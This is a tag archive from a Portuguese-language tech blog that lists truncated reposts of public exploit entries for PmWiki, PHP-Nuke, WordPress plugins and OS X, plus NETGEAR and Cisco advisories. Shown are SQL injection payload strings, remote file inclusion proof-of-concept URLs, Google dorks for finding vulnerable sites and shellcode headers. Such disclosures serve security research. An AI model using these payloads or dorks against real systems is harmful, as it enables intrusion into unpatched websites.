Skip to content
AppUnix

Tag: exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

23/11/2011 by little_oak

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be …

Continue Reading

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

23/11/2011 by little_oak

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # …

Continue Reading

WordPress jetpack plugin SQL Injection Vulnerability

23/11/2016 by little_oak

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 …

Continue Reading

OSX universal ROP shellcode Testado no SNOW LEOPARD

03/10/2011 by little_oak

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want …

Continue Reading

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011 by little_oak

Sense of Security – Security Advisory – SOS-11-011 Release Date. 20-Sep-2011 Last Update. – Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 …

Continue Reading

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 by little_oak

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Fonte: http://www.exploit-db.com/exploits/17882/

Continue Reading

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 by little_oak

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …

Continue Reading

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 by little_oak

Sense of Security – Security Advisory – SOS-11-010 Release Date. 19-Sep-2011 Last Update. – Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C < = TC4.1.2, MXP

Continue Reading

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …

Continue Reading

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

Continue Reading

Navegação por posts

  • 1
  • 2
  • 3
  • 4
  • …
  • 7
  • Next

Pesquisa

Categorias

  • Blog
  • cPanel
  • How Tos
  • Linux
  • Mac Os
  • MySQL
  • Wordpress

#Apoiadores

Patrocinador

Registre-se e ganhe $25



© 2021 AppUnix | Protegido Por MxGuardDoG